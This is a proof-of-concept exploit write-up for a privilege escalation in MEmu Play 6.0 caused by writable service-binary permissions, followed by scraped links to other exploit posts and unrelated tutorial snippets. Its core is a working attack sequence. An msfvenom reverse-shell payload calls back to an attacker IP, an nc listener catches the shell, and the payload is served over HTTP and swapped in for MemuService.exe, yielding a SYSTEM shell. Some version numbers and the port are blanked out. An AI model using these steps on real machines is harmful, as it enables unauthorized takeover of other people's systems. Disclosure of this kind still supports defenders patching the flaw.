# Exploit Title: Memu Play 6.0. - Privilege Escalation (PoC)

# Date: //

# Author: Alejandra Sánchez

# Vendor Homepage: https://www.memuplay.com/

# Software Link: https://www.memuplay.com/download-en.php?file_name=Memu-Setup&from=official_release

# Version: 6.0.

# Tested on: Windows  / Windows 

# Description:

#  Memu Play 6.0. suffers from Privilege Escalation due to insecure file permissions

# Prerequisites

# Local, Low privilege access with restart capabilities

# Details

# By default the Authenticated Users group has the modify permission to ESM folders/files as shown below.

# A low privilege account is able to rename the MemuService.exe file located in this same path and replace

# with a malicious file that would connect back to an attacking computer giving system level privileges

# (nt authority\system) due to the service running as Local System.

# While a low privilege user is unable to restart the service through the application, a restart of the

# computer triggers the execution of the malicious file.

C:\>icacls "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe"

C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe Everyone:(I)(F)

                                                      BUILTIN\Administrators:(I)(F)

                                                      BUILTIN\Users:(I)(F)

                                                      NT AUTHORITY\SYSTEM:(I)(F)

Successfully processed  files; Failed processing  files

C:\>sc qc MEmuSVC

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: MEmuSVC

        TYPE               :   WIN32_OWN_PROCESS

        START_TYPE         :    AUTO_START

        ERROR_CONTROL      :    NORMAL

        BINARY_PATH_NAME   : C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe

        LOAD_ORDER_GROUP   :

        TAG                : 

# Proof of Concept

. Generate malicious .exe on attacking machine

    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.130 LPORT= -f exe > /var/www/html/MemuService.exe

. Setup listener and ensure apache is running on attacking machine

    nc -lvp

    service apache2 start

. Download malicious .exe on victim machine

    Open browser to http://192.168.1.130/MemuService.exe and download

. Overwrite file and copy malicious .exe.

    Renename C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe > MemuService.bak

    Copy/Move downloaded 'MemuService.exe' file to C:\Program Files (x86)\Microvirt\MEmu\

. Restart victim machine

. Reverse Shell on attacking machine opens

    C:\Windows\system32>whoami

    whoami

    nt authority\system

[EXP]Memu Play 6.0.7 - Privilege Escalation的更多相关文章

  1. [EXP]Microsoft Windows - DfMarshal Unsafe Unmarshaling Privilege Escalation

    Windows: DfMarshal Unsafe Unmarshaling Elevation of Privilege (Master) Platform: Windows (not tested ...

  2. karottc A Simple linux-virus Analysis、Linux Kernel <= 2.6.37 - Local Privilege Escalation、CVE-2010-4258、CVE-2010-3849、CVE-2010-3850

    catalog . 程序功能概述 . 感染文件 . 前置知识 . 获取ROOT权限: Linux Kernel <= - Local Privilege Escalation 1. 程序功能概述 ...

  3. Linux/Unix System Level Attack、Privilege Escalation(undone)

    目录 . How To Start A System Level Attack . Remote Access Attack . Local Access Attack . After Get Roo ...

  4. FreeBSD Intel SYSRET Kernel Privilege Escalation Exploit

    /* * FreeBSD 9.0 Intel SYSRET Kernel Privilege Escalation exploit * Author by CurcolHekerLink * * Th ...

  5. Basic Linux Privilege Escalation

    (Linux) privilege escalation is all about: Collect - Enumeration, more enumeration and some more enu ...

  6. CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC

    /**  * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC  *  * Vitaly Nikolenko  * http://ha ...

  7. OSCP Learning Notes - Privilege Escalation

    Privilege Escalation Download the Basic-pentesting vitualmation from the following website: https:// ...

  8. Android linux kernel privilege escalation vulnerability and exploit (CVE-2014-4322)

    In this blog post we'll go over a Linux kernel privilege escalation vulnerability I discovered which ...

  9. [EXP]Microsoft Windows 10 - XmlDocument Insecure Sharing Privilege Escalation

    Windows: XmlDocument Insecure Sharing Elevation of Privilege Platform: Windows (almost certainly ear ...

随机推荐

  1. db2开启监控monitor 查看快照snapshot

    ths   https://blog.csdn.net/huaishu/article/details/9671771 #查看监控器 db2 get monitor switches #打开监控器db ...

  2. VueJs相关命令

    参考: https://www.jianshu.com/p/1626b8643676   安装axios $ npm install axios   如何打包 基于Vue-Cli,通过npm run ...

  3. PHP开发——变量

    变量的概念 l  变量是临时存储数据的容器: l  变量是存储内存当中: l  我们现实中有很多数据:姓名.性别.年龄.学历等: l  在计算机中,用变量来代替一个一个的数据: l  我们可以把计算机 ...

  4. swap的实现(没有中间变量)

    两数交换最常用的方法 void swap(int &a,int &b) { int temp=a; a=b; b=temp; } 如果没有中间变量temp可以使用呢,还有其他的三种方法 ...

  5. 在桌面创建robotframework Ride的快捷方式启动RIDE

    安装后robotframework-ride 后,每次启动时都要在Dos命令下启动 ,下面是创建快捷方式启动操作如下: 1.进入到python的安装目录的/Scripts目录下,找到ride.py文件 ...

  6. Ubuntu postgres 内网 安装 卸载

    # 安装pg,(使用安装包, 不能连接外网) tar包下载地址 https://www.postgresql.org/ftp/source/v11.1/放在/home/sxy 目录(随便放)cd /h ...

  7. 记一次Django报错Reverse for 'indextwo' with no arguments not found. 1 pattern(s) tried: ['$index/$']

    启动python manage.py runserver 打开127.0.0.1:8000,报错信息如下: Reverse for 'indextwo' with no arguments not f ...

  8. [快速幂][NOIP2012]转圈游戏

    转圈游戏 题目描述 n 个小伙伴(编号从 0 到 n-1)围坐一圈玩游戏.按照顺时针方向给 n 个位置编号,从0 到 n-1.最初,第 0 号小伙伴在第 0 号位置,第 1 号小伙伴在第 1 号位置, ...

  9. win7启动时怎么自动进入桌面

    1.按Win+R组合键,打开“运行”对话框.(Win是键盘下方左右两边的两个印有微软标志的键) 2.Windows XP/2003/2008/2008R2输入"control userpas ...

  10. Alpha 冲刺 (6/10)

    队名 火箭少男100 组长博客 林燊大哥 作业博客 Alpha 冲鸭鸭鸭鸭鸭鸭! 成员冲刺阶段情况 林燊(组长) 过去两天完成了哪些任务 协调各成员之间的工作 测试服务器并行能力 学习MSI.CUDA ...